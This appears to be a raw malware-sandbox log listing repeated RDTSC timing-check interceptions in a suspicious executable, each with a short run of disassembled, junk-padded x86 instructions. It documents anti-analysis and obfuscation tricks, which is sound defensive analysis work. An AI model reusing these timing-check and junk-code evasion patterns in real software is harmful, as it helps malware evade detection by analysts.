Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B836A9 second address: B836DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 je 00007FC22CC1B8A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC22CC1B8B2h 0x00000016 jno 00007FC22CC1B8A6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B83E7A second address: B83EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push ebx 0x0000000f jmp 00007FC22D01ECD9h 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B83FA5 second address: B84021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B8h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC22CC1B8B9h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jmp 00007FC22CC1B8ABh 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push esi 0x00000025 jmp 00007FC22CC1B8B7h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jnp 00007FC22CC1B8ACh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B87618 second address: B8762A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FC22D01ECCCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8762A second address: B87643 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B4h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B87643 second address: B87650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B87650 second address: B87656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B87656 second address: B8765A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8765A second address: B87681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC22CC1B8BFh 0x0000000e jmp 00007FC22CC1B8B7h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8BD09 second address: B8BD0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8BD0D second address: B8BD13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8BFF2 second address: B8C00C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC22D01ECC6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jg 00007FC22D01ECC6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C00C second address: B8C036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FC22CC1B8A6h 0x00000011 jmp 00007FC22CC1B8B9h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C036 second address: B8C03F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C03F second address: B8C045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C045 second address: B8C052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FC22D01ECCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C1B7 second address: B8C1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C1BC second address: B8C1C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C1C2 second address: B8C1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C65F second address: B8C663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C937 second address: B8C955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC22CC1B8B4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C955 second address: B8C95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C95B second address: B8C960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B92BF7 second address: B92BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B92BFD second address: B92C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97075 second address: B9709A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FC22D01ECD2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9709A second address: B970A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B971ED second address: B971F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97375 second address: B97379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97379 second address: B9739E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FC22D01ECCAh 0x0000000f push edx 0x00000010 pop edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9739E second address: B973AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FC22CC1B8A6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B977E9 second address: B97854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECD1h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC22D01ECD8h 0x0000000f popad 0x00000010 jnl 00007FC22D01ECEBh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FC22D01ECC6h 0x00000021 jl 00007FC22D01ECC6h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97854 second address: B9785F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97B02 second address: B97B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97B22 second address: B97B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007FC22CC1B8B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97B3C second address: B97B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC22D01ECD2h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97CB9 second address: B97CD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jns 00007FC22CC1B8A6h 0x00000010 pop edi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97E38 second address: B97E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B98105 second address: B9810B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B1E817 second address: B1E83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC22D01ECC6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FC22D01ECD8h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9B729 second address: B9B72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9B72F second address: B9B736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9B736 second address: B9B76F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FC22CC1B8B6h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9B76F second address: B9B77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B60C00 second address: B60C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B60C05 second address: B60C34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC22D01ECD1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B60C34 second address: B60C46 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FC22CC1B8A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61171 second address: B6117B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61220 second address: B61224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B612F1 second address: B612FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B612FE second address: B61308 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61308 second address: B6130E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6130E second address: B61312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B613A6 second address: B613B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B613B1 second address: B613CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8ABh 0x00000009 popad 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FC22CC1B8A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B613CF second address: B613FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FC22D01ECCEh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC22D01ECCFh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61B44 second address: B61B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61DFE second address: B61E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E02 second address: B61E0C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E0C second address: B61E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E12 second address: B61E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FC22CC1B8A8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 pushad 0x00000026 mov ebx, 6B61FBEAh 0x0000002b mov ecx, 38E79CF7h 0x00000030 popad 0x00000031 lea eax, dword ptr [ebp+1248B8A3h] 0x00000037 mov dword ptr [ebp+122D241Eh], ecx 0x0000003d nop 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E5A second address: B61E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E5E second address: B61E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E85 second address: B403F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 or edx, 474D8100h 0x0000000d call dword ptr [ebp+122D2AFEh] 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FC22D01ECCEh 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B403F3 second address: B403F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B403F7 second address: B40404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC22D01ECC6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B40404 second address: B40411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FC22CC1B8A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9BD1F second address: B9BD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9BD23 second address: B9BD3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9BD3B second address: B9BD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9C1B3 second address: B9C1C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC22CC1B8A6h 0x0000000a jnl 00007FC22CC1B8A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9C1C3 second address: B9C1C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9C497 second address: B9C4AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B0h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9C4AD second address: B9C4D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FC22D01ECC6h 0x0000000b jnl 00007FC22D01ECC6h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007FC22D01ECD0h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA19BB second address: BA19C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA1E2C second address: BA1E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22D01ECCBh 0x00000009 jmp 00007FC22D01ECCCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA1E47 second address: BA1E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2238 second address: BA2259 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECD7h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA23DA second address: BA23E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA23E0 second address: BA23F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC22D01ECCDh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA259F second address: BA25C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FC22CC1B8A6h 0x00000010 jmp 00007FC22CC1B8B5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA25C4 second address: BA25D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FC22D01ECC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA25D9 second address: BA25EC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA277F second address: BA2785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2785 second address: BA278B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2A77 second address: BA2A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2A85 second address: BA2A8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2A8B second address: BA2A9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007FC22D01ECC6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
